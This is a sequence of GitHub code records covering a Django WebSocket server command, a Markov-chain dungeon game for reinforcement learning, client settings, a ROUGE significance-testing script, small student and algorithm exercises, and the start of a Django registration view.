Twisted/Autobahn WebSocket interface server\")\n self.stdout.write(\" Channel backend: %s\" % channel_backend)\n self.stdout.write(\" Listening on: ws://0.0.0.0:%i\" % port)\n WebsocketTwistedInterface(channel_backend=channel_backend, port=port).run()\n else:\n from channels.interfaces.websocket_asyncio import WebsocketAsyncioInterface\n self.stdout.write(\"Running asyncio/Autobahn WebSocket interface server\")\n self.stdout.write(\" Channel backend: %s\" % channel_backend)\n self.stdout.write(\" Listening on: ws://0.0.0.0:%i\" % port)\n WebsocketAsyncioInterface(channel_backend=channel_backend, port=port).run()\n","repo_name":"sonthonaxrk/channels","sub_path":"channels/management/commands/runwsserver.py","file_name":"runwsserver.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"16919627662","text":"#!/usr/bin/env python3\n# encoding: utf-8\n# ───────────────────────────────── imports ────────────────────────────────── #\nfrom .markov import MarkovChain\nfrom .characters import Adventurer, AdventurerLearning,State\nfrom .dungeon_map import DungeonMap, Direction, Cell, AStar\nfrom .utils import Color, color_grid\nfrom random import random\nimport numpy as np\n# ──────────────────────────────────────────────────────────────────────────── #\n\n# ────────────── Kernel classes for the MADI project (01/2019) ─────────────── #\nclass Dungeon(object):\n \"\"\" Dungeon object containing all the game logic \"\"\"\n\n p_enemy = 0.7\n\n def __init__(self, n: int, m: int, nb_players: int = 1, player_classes: list= None, new_env: bool = True):\n self.n, self.m = n, m\n State.configure(self.n, self.m)\n\n # ------------------------ creating a new map ------------------------ #\n self.map = DungeonMap(n, m, new_env)\n while not self.winnable:\n self.map = DungeonMap(n, m, new_env)\n\n self.last_actions = [None for i in range(nb_players)]\n self.over, self.won = False, False\n self.caption = ''\n\n self.teleport_distributions = {}\n\n # ------------------------ generating players ------------------------ #\n player_classes = [AdventurerLearning for i in range(nb_players)] \\\n if player_classes is None else player_classes\n assert len(player_classes) >= nb_players\n self.agents = [pclass(self) for pclass in player_classes[:nb_players]]\n\n State.configure(n, m)\n\n # ─────────── display a transition matric in a readable output ─────────── #\n def display_transition(self, s: State, a: Direction):\n \"\"\"\n Displays a transition for a given state and action\n \"\"\"\n arr = ['↑', '→', '↓', '←'][a.to_int]\n print('{s},{arr}:'.format(s=s, arr=arr))\n tr = self.make_transition_matrix()[s.id, a.to_int]\n for (i, p) in enumerate(tr):\n if p > 0:\n print('- {p:4.2%}: {st}'.format(p=p, st=State(s_id=i)))\n\n # ───────────────────────── add agent post init ────────────────────────── #\n def add_agent(self, agent: Adventurer):\n self.agents.append(agent)\n\n # ──────────────────── constructing the reward matrix ──────────────────── #\n def make_reward_matrix(self, T: np.array):\n \"\"\"\n The reward matrix is quite simple:\n - death → (*,*,*) : -1\n - (*,0,*) → (*,1,*) take key : 1\n - (*,1,*) → (*,2,*) take treasure : 1\n - (*,2,start) → (*,2,start) : 1\n - else, 0\n Negative reward for death\n Positive reward for (actually) picking up the key, picking up the treasure\n and returning to start with the treasure\n \"\"\"\n n, m = self.n, self.m\n n_state = State.max_id + 1\n death = n_state - 1\n R = np.zeros((n_state, 4), np.float64)\n for sw in range(2):\n for tr in range(3):\n for p in range(n * m):\n s = State(sw, tr, p)\n for a in Direction:\n # we only reward 'certain' actions, actions with\n # probability 1 to lead to a state\n if np.amax(T[s.id, a.to_int]) == 1:\n certain_state = np.argmax(T[s.id, a.to_int])\n st = State(s_id=certain_state) # target state\n # -------------- (*,0,*) → (*,1,*) --------------- #\n # (*  *) (*  *)\n if s.treasure == 0 and st.treasure == 1:\n R[s.id, a.to_int] = 0.5\n # -------------- (*,1,*) → (*,2,*) --------------- #\n # (*  *) (* ﰤ *)\n if s.treasure == 1 and st.treasure == 2:\n R[s.id, a.to_int] = 0.5\n # -------------- (0,*,*) → (1,*,*) --------------- #\n # ( * *) (理* *)\n if s.sword == 0 and st.sword == 1:\n R[s.id, a.to_int] = 0.5\n # ---------- (*,2,start) → (*,2,start) ----------- #\n # (* 2 ◉ ) (* 2 ◉ ) \n if s.treasure == st.treasure == 2 and \\\n s.position == st.position == n * m - 1:\n R[s.id, a.to_int] = 1\n # ---------------- death → death ----------------- #\n if s.id == st.id == death:\n R[s.id, a.to_int] = -1\n return R\n\n # ────────────────── constructing the transition matrix ────────────────── #\n def make_transition_matrix(self):\n \"\"\"\n Creates the complete transition matrix, including every possible state\n and action, and the transition from one to another.\n\n Contains all the possible values of T(s, a, s'), the probability to go\n from s to s' by doing a.\n \"\"\"\n n_states = State.max_id + 1 # last state is death\n n, m = self.n, self.m\n T = np.zeros((n_states, 4, n_states), np.float64)\n S = self.markov_chain()\n M = self.moving_markov_chain()\n # ────────────────────────── for each state ────────────────────────── #\n for sw in range(2):\n for tr in range(3):\n for p in range(n * m):\n i, j = p // m, p % m\n s = State(sw, tr, p)\n cell = self.map[i, j]\n # ───────── find the transitions from that state ───────── #\n if cell == Cell.magic_portal or cell == Cell.moving_platform:\n transitions = self.special_transition(S, M, s)\n else:\n transitions = S[s.id, :]\n # ─────── find the state - actions that lead to it ─────── #\n for ((k, l), direction) in self.map.neighbors(i, j):\n # if (k,l) is ↑ of (i, j), (i, j) is ↓ of (k, l)\n s.position = k * m + l\n reverse_dir = direction.reverse\n T[s.id, reverse_dir.to_int, :] = transitions\n # ─────────── any action not yet found is to stay inplace ──────────── #\n for sid in range(n_states):\n for a in Direction:\n s = State(s_id=sid)\n if sum(T[s.id, a.to_int]) == 0:\n mu = np.zeros(n_states, np.float64)\n mu[s.id] = 1\n T[s.id, a.to_int, :] = S.iterate(mu)\n return T\n\n # ──────────────── handling moving platforms and portals ───────────────── #\n def special_transition(self, S: MarkovChain, M: MarkovChain, state: State):\n \"\"\"\n @param S: Markovchain= a markov chain representing the stable states of\n the dungeon, i.e. the states that must only be iterated once\n ex: the 'over an ennemy cell' state. that state might lead to\n itself, and yet you won't fight the ennemy again.\n this markov chain must only be used to advance of 1 time step.\n\n it contains every actual states of the game, including the\n 'death' state.\n\n @param M: Markochain= a markov chain representing the 'moving states' of\n the dungeon, i.e. the states that can be recursive. those\n states, such as the moving platform and the portal, are just\n temporary. they lead you to another stable state, or to\n another moving state that will lead you back elsewhere. they\n can be infinitely cycling between themselves.\n To deal with such states, we need to iterate a markov chain\n until we reach stable probabilities, i.e. probabilities over\n the states that are unchanged upon iteration of the markov\n chain.\n\n To simplify this, as the two cells considered here only impact\n the position on the grid, we use a reduced version of the\n states, only including n * m states (the grid positions).\n\n The result obtained at stability is the probability to be in\n each cell of the dungeon, after using a moving platform or\n teleporter. It accounts for every recursive teleportation\n that can occur.\n\n @param state: State= the particular state to be computed. It must be\n a state where the position corresponds to a 'moving cell'.\n\n This function deals with two difficult or 'special' states, the portal\n and the moving platform. They teleport the player to another cell, that\n is then triggered as if the player just walked into it. If that state is\n a portal or moving platform, the result is recursive and might lead again\n to a teleportation, effectively creating possible infinite loop.\n\n To deal with such states, we use two markov chains. One considering stable\n states, that must be iterated only once, and one for the recursive states\n that is iterated until we find a correct probability distribution.\n\n Ad this methods operates with heavy matrix operations that might be\n needed multiple times, we store the results of already computed calculations\n to reuse them and modify them according to the need.\n \"\"\"\n # This method will be heavily commented\n n, m = self.n, self.m\n\n # ──────────── extracting the grid position of the state ───────────── #\n p = state.position\n\n # ────────────── checking that the state given is valid ────────────── #\n assert self.map[p] in (Cell.magic_portal, Cell.moving_platform)\n\n # ────────────────── checking for existing results ─────────────────── #\n distrib = np.zeros(n * m, np.float64)\n if p in self.teleport_distributions:\n distrib = self.teleport_distributions[p]\n # ─────────────── compute the results if not available ─────────────── #\n else:\n # Create a probability vector where we are in p\n mu = np.zeros(n * m, np.float64)\n mu[p] = 1\n distrib = M.convergence_iteration(mu)\n self.teleport_distributions[p] = distrib\n assert distrib.shape == (n * m,) and abs(sum(distrib) - 1) < 10e-6\n\n # ───────────────── convert grid positions to state ────────────────── #\n # We now have the distribution over the grid position. However, we need\n # a distribution over the real state of the game, accounting for items.\n # As the special cells do not impact (yet) items, we just need to \n # put this vector at the right place in the (6 times) larger state vector\n # of the dungeon.\n padding = state.sword * 3 + state.treasure\n block_size = n * m\n\n transition = np.zeros(State.max_id + 1, np.float64)\n transition[padding * block_size: (padding + 1) * block_size] = distrib\n\n # ───── iterate once the new states over the rest of the dungeon ───── #\n transition = S.iterate(transition, 1)\n assert abs(sum(transition) - 1) < 10e-5\n return transition\n\n # ──────────────────── constructing the markov chain ───────────────────── #\n def markov_chain(self):\n n_state = State.max_id + 1 # because max id is n - 1\n M = np.zeros((n_state, n_state), np.float64)\n n, m = self.n, self.m\n death = n_state - 1\n M[death, death] = 1\n for sw in range(2):\n for tr in range(3):\n for p in range(n * m):\n i, j = p // m, p % m\n cell = self.map[i, j]\n state = State(sw, tr, p)\n index = state.id\n # ────────────── empty cell : stay inplace ─────────────── #\n if cell == Cell.empty or cell == Cell.start:\n M[index, index] = 1\n # ───────────── wall : bounce back to start ────────────── #\n if cell == Cell.wall:\n state.position = n * m - 1\n M[index, state.id] = 1\n # ──────────────── crack : kill instantly ──────────────── #\n if cell == Cell.crack:\n M[index, death] = 1\n # ──────────────────── ennemy : fight ──────────────────── #\n if cell == Cell.enemy_normal and state.sword:\n M[index, index] = 1 # fight won\n if cell == Cell.enemy_normal and not state.sword:\n M[index, index] = Dungeon.p_enemy\n M[index, death] = 1 - Dungeon.p_enemy\n # ───────── political enemy : do not use a sword ───────── #\n if cell == Cell.enemy_special and not state.sword:\n M[index, index] = 1 # not dangerous when weaponless\n if cell == Cell.enemy_special and state.sword:\n M[index, index] = Dungeon.p_enemy\n M[index, death] = 1 - Dungeon.p_enemy\n # ─────────────── magic sword acquisition ──────────────── #\n if cell == Cell.magic_sword:\n state.sword = 1\n M[index, state.id] = 1\n # ─────────────────── key acquisition ──────────────────── #\n if cell == Cell.golden_key:\n state.treasure = max(state.treasure, 1)\n # get the key if you didn't have it, else keep the treasure\n M[index, state.id] = 1\n # ───────────────── treasure acquisition ───────────────── #\n if cell == Cell.treasure:\n state.treasure = 2 if state.treasure >= 1 else 0\n M[index, state.id] = 1\n # ─────── trap : back to start, death, or nothing ──────── #\n if cell == Cell.trap:\n M[index, index] = 0.6 # nothing happens\n state.position = n * m - 1\n M[index, state.id] = 0.3 # tunnel to start\n M[index, death] = 0.1 # death\n if cell == Cell.magic_portal or cell == Cell.moving_platform:\n M[index, index] = 1\n return MarkovChain(M)\n\n def moving_markov_chain(self):\n \"\"\"\n Creates a markov chain with grid cells as states, to determine the\n probability to be in a state when using a recurrent transition (portal,\n moving-platform)\n \"\"\"\n n, m = self.n, self.m\n n_state = n * m\n M = np.zeros((n_state, n_state), np.float64)\n for p in range(n * m):\n i, j = p // m, p % m\n cell = self.map[i, j]\n if cell == Cell.moving_platform:\n valid_neighbors = self.map.all_cell_dist((i, j), 1)\n for (k, l) in valid_neighbors:\n p_next = k * m + l\n M[p, p_next] = 1 / len(valid_neighbors)\n elif cell == Cell.magic_portal:\n valid_cells = self.map.all_cell_dist((i, j), -1)\n for (k, l) in valid_cells:\n p_next = k * m + l\n M[p, p_next] = 1 / len(valid_cells)\n else:\n M[p, p] = 1\n return MarkovChain(M)\n\n # ────────────────────── is that dungeon winnable ? ────────────────────── #\n @property\n def winnable(self):\n \"\"\" getter for winnable attribute \"\"\"\n return self.map.winnable\n\n # ──────────────────────────── moving agents ───────────────────────────── #\n def move(self, agent: Adventurer, direction: Direction):\n \"\"\"\n Moves an agent in a direction\n\n @return an int, the reward associated with this action in that state\n \"\"\"\n self.last_actions[self.agents.index(agent)] = direction\n agent.pos = self.map.move(agent.pos, direction)\n return self.enter(agent, self.map[agent.pos])\n\n def teleport(self, agent: Adventurer, position: (int, int)):\n \"\"\" Teleports an agent to a given position (might be usefull for animations)\"\"\"\n i, j = position\n assert 0 <= i < self.n and 0 <= j < self.m, \"can't teleport outside of the dungeon\"\n assert self.map[position] != Cell.wall, \"can't teleport in a wall\"\n agent.pos = position\n self.caption += '\\n'\n return self.enter(agent, self.map[agent.pos])\n\n # ─────────────────────────── entering a cell ──────────────────────────── #\n def enter(self, agent: Adventurer, cell: Cell):\n \"\"\"\n Performs the most simple cells tasks, and delegates to appropriate\n functions if needed\n\n @return an int representing the reward of the move\n \"\"\"\n # assert cell != Cell.wall, \"wall cells should never be entered\"\n sword = agent.has_item(Cell.magic_sword)\n # -------------- walls bounce back to starting position -------------- #\n if cell == Cell.wall:\n self.caption += \"Bounced against a wall ... Back to start !\"\n return self.teleport(agent, (self.n - 1, self.m - 1))\n # ---------------- items are treated in the same way ----------------- #\n elif cell == Cell.golden_key or cell == Cell.magic_sword:\n if agent.has_item(cell):\n self.caption += \"Can't pick up another {}, already have one\".format(cell.name)\n else:\n self.caption += \"Picked up an item ({}) !!\".format(cell.name)\n agent.acquire_item(cell)\n return 0.5\n # ------------------ treasure is particular, though ------------------ #\n elif cell == Cell.treasure and agent.has_item(Cell.golden_key):\n if agent.has_item(cell):\n self.caption += \"Can't pick up another {}, already have one\".format(cell.name)\n else:\n self.caption += \"Got the treasure !\"\n agent.acquire_item(cell)\n return 0.5\n # ------------ magic portal and moving platforms teleport ------------ #\n elif cell == Cell.magic_portal:\n valid_cell = self.map.random_cell_dist()\n self.caption += \"STARGAAAATE : {} → {}\".format(agent.pos, valid_cell)\n return self.teleport(agent, valid_cell)\n elif cell == Cell.moving_platform:\n valid_neighbor = self.map.random_cell_dist(agent.pos, 1)\n (nx, ny), (x, y) = valid_neighbor, agent.pos\n self.caption += \"Woops ! It moves ! (teleported to {})\".format(Direction((nx - x, ny - y)).name)\n return self.teleport(agent, valid_neighbor) # adjacent cell <=> Manhattan dist of 1\n # ---------------------- oh, CRACK, you're dead ---------------------- #\n elif cell == Cell.crack:\n self.caption += \"DAMN ! CRACK !!! I'm dead.\"\n self.kill(agent)\n # ----------------------- care, it's a trap !! ----------------------- #\n elif cell == Cell.trap:\n p = random() # random floating number in [0, 1[\n self.caption += \"ITS A TRAPPP \"\n if p < 0.1:\n self.caption += \"I'm dead.\"\n self.kill(agent) # 10% : death\n elif p < 0.4:\n self.caption += \"Back to start. (tunneled :] )\"\n return self.teleport(agent, (self.n - 1, self.m - 1)) # 30% : back to start\n else:\n self.caption += \"But it's ineffective.\"\n # 60% : nothing\n # ----------------------------- FIGHT !! ----------------------------- #\n # -------------------- normal enemy (use a sword) -------------------- #\n elif cell == Cell.enemy_normal and not sword:\n # no fight for the brave wielding a sword\n self.caption += \"Enemy in sight ! \"\n p = random() # random floating number in [0, 1[\n if p < Dungeon.p_enemy: # the player is victorious (p_enemy)%\n self.caption += \"Easily defeated.\"\n else:\n self.caption += \"Woops, I'm dead\"\n self.kill(agent)\n elif cell == Cell.enemy_normal and sword:\n self.caption += \"BIM ! BAM ! MAGIC SWORD IN YOUR FACE !\"\n # -------------------------- special enemy --------------------------- #\n elif cell == Cell.enemy_special and not sword:\n # don't fight\n self.caption += \"Not a threat for me.\"\n elif cell == Cell.enemy_special and sword:\n self.caption += \"This enemy can't be slain ! \"\n p = random() # random floating number in [0, 1[\n if p > Dungeon.p_enemy: # the player is victorious (p_enemy)%\n self.caption += \"I managed to flee.\"\n else:\n self.caption += \"Goodbye, sweet world\"\n self.kill(agent)\n # ------------ returning to the start (with the treasure) ------------ #\n elif cell == Cell.start and agent.has_item(Cell.treasure):\n self.caption += \"I WON. !!!\"\n self.victory(agent)\n return 1\n\n # ───────────── handle the reward in various situations ────────────── #\n return -1 if not agent.alive else 0\n\n # ────────────────────────────────── Reset ─────────────────────────────── #\n def reset(self):\n \"\"\" Hard reset : resets the map, and every agent \"\"\"\n self.map.reset()\n self.m, self.n = self.map.m, self.map.n\n self.last_actions = [None for x in self.agents]\n State.configure(self.n, self.m)\n self.caption = ''\n self.over, self.won = False, False\n for agent in self.agents:\n agent.n, agent.m = self.n, self.m\n agent.reset()\n\n def replay_map(self):\n \"\"\" Soft reset to replay the same map \"\"\"\n self.map.reset()\n self.last_actions = [None for x in self.agents]\n self.caption = ''\n self.over, self.won = False, False\n for agent in self.agents:\n agent.soft_reset()\n\n def load_map(self, path: str):\n self.map.load_map(path)\n self.reset()\n\n def save_map(self, path: str):\n self.map.save_map(path)\n\n # ────────────────────────── victory and defeat ────────────────────────── #\n def victory(self, agent: Adventurer):\n \"\"\" Method to restart the simulation and handle a victory \"\"\"\n self.won, self.over = True, True\n\n def defeat(self):\n \"\"\" Method to restart the simulation and handle defeat \"\"\"\n self.won, self.over = False, True\n\n def kill(self, agent: Adventurer):\n \"\"\" Method handling the death of an agent \"\"\"\n # @TODO: code this\n agent.kill()\n if all(map(lambda a: not a.alive, self.agents)):\n self.defeat() # every player is dead\n\n # ─────────────────────────── priting methods ──────────────────────────── #\n def show_last_actions(self):\n strings = []\n if any([a is None for a in self.last_actions]) or not self.last_actions:\n return 'no move yet'\n for (h, agent) in enumerate(self.agents):\n strings += ['player {} played {}'.format(\n h, '↑→↓←'[self.last_actions[h].to_int])]\n return '\\n'.join(strings)\n\n def colored_str(self):\n n, m = self.n, self.m\n key = None\n sword = None\n for p in range(n * m):\n i, j = p // m, p % m\n if self.map[i, j] == Cell.golden_key:\n key = (i, j)\n if self.map[i, j] == Cell.magic_sword:\n sword = (i, j)\n color = {\n Color.blue: [sword],\n Color.red: [(0, 0), key],\n Color.green: [self.agents[0].pos]\n }\n grid = ['' for i in range(n * m)]\n for p in range(n * m):\n grid[p] = self.map[p].value\n for (h, agent) in enumerate(self.agents):\n if agent.cell_id == p:\n if h == 0:\n grid[p] += '*'\n elif h == 1:\n grid[p] = '^' + grid[p]\n\n colored_map = color_grid(grid, (n, m), content_colors=color)\n legends = []\n agents_symbols = '*^'\n for h, agent in enumerate(self.agents):\n legends.append('{}: agent {}\\'s position'.format(agents_symbols[h], h))\n\n legend = '\\n'.join(legends)\n return colored_map + legend\n\n # ───────────────────���──────── magic methods ───────────────────────────── #\n def __str__(self):\n \"\"\" adds the position of agents to the string representation \"\"\"\n agents_symbols = '*^'\n assert len(self.agents) <= len(agents_symbols)\n if not self.agents:\n return str(self.map)\n map_repr = list(str(self.map))\n legends = []\n for h, agent in enumerate(self.agents):\n line = 1 + agent.i * 2\n col = 3 + agent.j * 4 - h * 2 # |^x*| when both agents are on the same cell\n map_repr[line * (self.m * 4 + 2) + col] = agents_symbols[h]\n legends.append('{}: agent {}\\'s position'.format(agents_symbols[h], h))\n\n legend = '\\n'.join(legends)\n return ''.join(map_repr) + legend # + '\\n'\n\n def __repr__(self):\n return \"Dungeon({} x {}, {} players)\".format(self.n, self.m, len(self.agents))\n path_back = astar.process_shortest_path(treasure, start)\n\n # ----------------------- version with colors ------------------------ #\n agents_symbols = '*^'\n assert len(self.agents) <= len(agents_symbols)\n if not self.agents:\n return str(self.map)\n legends = []\n map_str = [cell.value for cell in self.map]\n for h, agent in enumerate(self.agents):\n (i, j), s = agent.pos, agents_symbols[h]\n p = i * self.map.m + j\n map_str[p] = s + map_str[p] if h else map_str[p] + s\n legends.append('{}: agent {}\\'s position'.format(s, h))\n\n legend = '\\n'.join(legends)\n map_repr = utils.color_grid(map_str, (self.map.n, self.map.m),\n border_colors={\n utils.Color.blue: path_to_key,\n utils.Color.red: path_to_treasure,\n utils.Color.green: path_back\n })\n return map_repr + legend # + '\\n'\n\n\n# ──────────────────────────────── executable ──────────────────────────────── #\n# if __name__ == '__main__':\n # np.set_printoptions(precision=5, linewidth=200)\n\n # custom_game = Dungeon(4, 3)\n # b = Cell.start\n # p = Cell.magic_portal\n # e = Cell.empty\n # s = Cell.magic_sword\n # m = Cell.moving_platform\n # t = Cell.treasure\n # k = Cell.golden_key\n\n # # custom_game.map.load([t, p, p, s,\n # # p, p, m, p,\n # # m, p, m, m,\n # # k, m, p, b])\n # custom_game.map.load([t, e, s,\n # e, m, e,\n # e, m, e,\n # k, e, b])\n\n # print(custom_game)\n\n # S = custom_game.markov_chain()\n # M = custom_game.moving_markov_chain()\n\n # # print(State(0, 0, 11))\n\n # # tr = custom_game.special_transition(S, M, State(0, 0, 11))\n # # for (i, p) in enumerate(tr):\n # # s = State(s_id=i)\n # # if p > 0:\n # # print('- {:4.2%}: {}'.format(p, s))\n\n # T = custom_game.make_transition_matrix()\n # custom_game.display_transition(State(0, 0, 15), Direction.NORTH)\n","repo_name":"Slyces/RL-MDP","sub_path":"dungeon_game/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":30858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74735729424","text":"# Author: Mr.Xu\n# @Time : 2019/10/2 15:59\nimport os\n\nview_meg = '''\n请选择角色编号:\n 1 管理员\n 2 普通用户\n q 退出\n'''\nadmin_msg = '''\n 1.注册\n 2.登陆\n 3.上传视频\n 4.删除视频\n 5.发布公告\n'''\nuser_msg = '''\n 1.注册\n 2.登陆\n 3.冲会员\n 4.查看视频\n 5.下载免费电影\n 6.下载收费视频\n 7.查看观影记录\n 8.查看公告\n'''\nBASE_PATH = os.path.dirname(os.path.dirname(__file__))\nUPLOAD_MOVIE_PATH = os.path.join(BASE_PATH, \"upload_movies\")\n\n","repo_name":"XuCheng121/youku_sys","sub_path":"youku_client/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"zh","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"70847149905","text":"import numpy as np\nfrom numpy import genfromtxt\nfrom scipy.stats import ttest_ind\nfrom scipy.stats import ks_2samp\nfrom scipy.stats import wilcoxon\nfrom scipy import stats\nimport csv\n\n\nclass SignificanceTesting(object):\n\tdef __init__(self, file_path):\n\t\tself.filePath = file_path\n\t\tself.models_scores = None\n\t\tself.data = None\n\t\tself.load_data()\n\n\t\t# statistical analysis\n\t\tself.mean = 0.0\n\t\tself.median = 0.0\n\t\tself.mode = 0.0\n\t\tself.min = 0.0\n\t\tself.max = 0.0\n\n\t\t# table data entry\n\t\tw = 6\n\t\th = 13\n\t\tself.results_data = [[0 for x in range(w)] for y in range(h)]\n\n\tdef load_data(self):\n\t\tself.models_scores = ['Baseline_R2', 'Baseline+Fusion_R2', 'Baseline+Ordering_R2',\n\t\t\t\t\t\t\t'Baseline+Ordering+Fusion_R2', 'Baseline_RSU4',\t'Baseline+Fusion_RSU4',\n\t\t\t\t\t\t\t'Baseline+Ordering_RSU4', 'Baseline+Ordering+Fusion_RSU4']\n\t\tself.data = genfromtxt(self.filePath, delimiter=',')[1:].T\n\n\tdef ks_test(self, list_a, list_b):\n\t\tvalue, pvalue = ks_2samp(list_a, list_b)\n\t\treturn pvalue\n\n\tdef t_test(self, list_a, list_b):\n\t\tvalue, pvalue = ttest_ind(list_a, list_b)\n\t\treturn pvalue\n\n\tdef wilcoxon_test(self, list_a, list_b):\n\t\tT, pvalue = wilcoxon(list_a, list_b)\n\t\treturn pvalue\n\n\tdef stat_analysis(self):\n\t\t# print(self.data)\n\t\tself.mean = np.mean(self.data, axis=1)\n\t\t# [ 0.4165538 0.3029308 0.4124338 0.2929442 0.4165538 0.3029308 0.4124338 0.2929442]\n\t\tself.median = np.median(self.data, axis=1)\n\t\t# [ 0.33333 0.218255 0.318015 0.207615 0.33333 0.218255 0.318015 0.207615]\n\t\tself.mode = stats.mode(self.data, axis=1)\n\t\t# ModeResult(mode=array([[ 1.], [ 0.], [ 0.], [ 0.], [ 1.], [ 0.], [ 0.], [ 0.]]),\n\t\t# \t\t\t count=array([[12], [17], [19], [17], [12], [17], [19], [17]]))\n\t\tself.min = np.min(self.data, axis=1) # [ 0. 0. 0. 0. 0. 0. 0. 0.]\n\t\tself.max = np.max(self.data, axis=1) # [ 1. 1. 1. 1. 1. 1. 1. 1.]\n\n\tdef mean_diff_test(self, a, b):\n\t\treturn b - a\n\n\tdef init_table(self):\n\t\tself.results_data[0] = ['metric', 'model', 'mean diff', 'P(T test)', 'P(wilcoxon test)', 'P(ks test)']\n\t\tfor row in xrange(1, 7):\n\t\t\tself.results_data[row][0] = 'ROUGE-2'\n\t\tfor row in xrange(7, 13):\n\t\t\tself.results_data[row][0] = 'ROUGE-SU4'\n\t\tself.results_data[1][1] = 'Baseline & Fusion'\n\t\tself.results_data[2][1] = 'Baseline & Ordering'\n\t\tself.results_data[3][1] = 'Baseline & Ordering+Fusion'\n\t\tself.results_data[4][1] = 'Fusion & Ordering'\n\t\tself.results_data[5][1] = 'Fusion & Ordering+Fusion'\n\t\tself.results_data[6][1] = 'Ordering & Ordering+Fusion'\n\n\t\tself.results_data[7][1] = 'Baseline & Fusion'\n\t\tself.results_data[8][1] = 'Baseline & Ordering'\n\t\tself.results_data[9][1] = 'Baseline & Ordering+Fusion'\n\t\tself.results_data[10][1] = 'Fusion & Ordering'\n\t\tself.results_data[11][1] = 'Fusion & Ordering+Fusion'\n\t\tself.results_data[12][1] = 'Ordering & Ordering+Fusion'\n\n\t\treturn self.results_data\n\n\tdef fill_results(self):\n\t\t# mean diff\n\t\t# baseline/fusion, baseline/ordering, baseline/ordering+fusion,\n\t\t# fusion/ordering, fusion/ordering+fusion, ordering/ordering+fusion\n\t\tmean_rouge2 = self.mean[0:4]\n\t\tmean_rougesu4 = self.mean[4:]\n\t\tassert(len(mean_rouge2) == len(mean_rougesu4))\n\t\tself.cross_evaluate(self.mean_diff_test, 2, mean_rouge2, mean_rougesu4)\n\n\t\tdata_rouge2 = self.data[0:4]\n\t\tdata_rouge4 = self.data[4:]\n\t\tself.cross_evaluate(self.t_test, 3, data_rouge2, data_rouge4)\n\t\tself.cross_evaluate(self.wilcoxon_test, 4, data_rouge2, data_rouge4)\n\t\tself.cross_evaluate(self.ks_test, 5, data_rouge2, data_rouge4)\n\n\tdef cross_evaluate(self, fn, col_id, data_rouge2, data_rouge4):\n\t\tindex = 1\n\t\tfor i, list_a in enumerate(data_rouge2):\n\t\t\tfor j, list_b in enumerate(data_rouge2[i + 1:]):\n\t\t\t\tself.results_data[index][col_id] = fn(list_a, list_b)\n\t\t\t\tindex += 1\n\t\tfor i, list_a in enumerate(data_rouge4):\n\t\t\tfor j, list_b in enumerate(data_rouge4[i + 1:]):\n\t\t\t\tself.results_data[index][col_id] = fn(list_a, list_b)\n\t\t\t\tindex += 1\n\n\tdef write_output(self):\n\t\tresults_file = open('SigTestResults2.csv', 'w')\n\t\twith results_file:\n\t\t\twriter = csv.writer(results_file)\n\t\t\twriter.writerows(self.results_data)\n\t\tresults_file.close()\n\t\tprint(\"Dump result to SigTestResults2.csv successfully!\")\n\n\t# def boxing_plot(self):\n\t# \tplt.figure()\n\t# \tplt.boxplot(self.data.T)\n\t# \tplt.show()\n\n\nif __name__ == '__main__':\n\tfile_path = \"ROUGE_SCORES.csv\"\n\tsigInstance = SignificanceTesting(file_path)\n\tsigInstance.stat_analysis()\n\t# ks = sigInstance.ks_test()\n\t# t = sigInstance.t_test()\n\t# w = sigInstance.wilcoxon_test()\n\tsigInstance.init_table()\n\tsigInstance.fill_results()\n\tsigInstance.write_output()\n\n\n","repo_name":"hw9603/significance-testing","sub_path":"sigTesting.py","file_name":"sigTesting.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11640344014","text":"\nfrom random import randrange\nimport os\n\nos.system (\"cls\") \nnombre = [\"Anthony\", \"Addil\", \"Yohanna\", \"Karla\"]\ntemas = [\"Preguntas #1 y #2\", \"Pregunta #3\", \"Preguntas #4\", \"Preguntas #5\"]\ni = 0\nj = 0\nwhile i < 4: \n print(\"El estudiante \" + nombre[i] + \" le tocan las \" + temas[randrange(4)])\n i += 1","repo_name":"Anthonk08/Example-1","sub_path":"Programa de aletoriedad/Aletorio.py","file_name":"Aletorio.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13001594238","text":"import sys\nsys.stdin = open(\"D5_4701_input.txt\", \"r\")\n\nT = int(input())\nfor test_case in range(T):\n N = int(input())\n A = sorted(list(map(int, input().split())))\n B = sorted(list(map(int, input().split())))\n rate = []\n arr = [[0] * (N + 1) for _ in range(N + 1)]\n arr[0][0] = 1\n size = [0, 0]\n\n for i in range(N):\n rate.append((A[i], 0))\n rate.append((B[i], 1))\n rate = sorted(rate, key = lambda x : x[0])\n\n for i in range(2 * N):\n nt = rate[i][1]\n size[nt] += 1\n\n for j in range(N - 1, - 1, - 1):\n for k in range(N):\n if arr[j][k]:\n remains = size[nt ^ 1] - j\n\n if remains:\n arr[j + 1][k + (nt ^ 1)] = (arr[j + 1][k + (nt ^ 1)] + arr[j][k] * remains) % 1000000007\n\n print(\"#{}\".format(test_case + 1), *arr[N])","repo_name":"hongyong3/TIL","sub_path":"Algorithm/Swea/D5_4701.py","file_name":"D5_4701.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25833044874","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom .models import User, Book, Author \nfrom django.views.decorators.csrf import csrf_exempt\n# Create your views here.\nfrom django.http import HttpResponse\nfrom .models import User\nfrom django.db import connection\nfrom sslcommerz_lib import SSLCOMMERZ \nfrom datetime import date, timedelta\n\ndef index(request):\n return render(request, 'start_page/index.html')\n\ndef register_user(request):\n try:\n if(request.method == \"POST\"):\n fname = request.POST['firstname']\n lname = request.POST['lastname']\n email = request.POST['email']\n password = request.POST['password']\n nid = request.POST['nid']\n phone = request.POST['phone_number']\n address = request.POST['address']\n age = request.POST['age']\n\n # info = [fname, lname, email, password, nid, phone, address, age]\n # request.session['registered_info'] = info\n\n with connection.cursor() as cursor:\n cursor.execute(\"insert into user 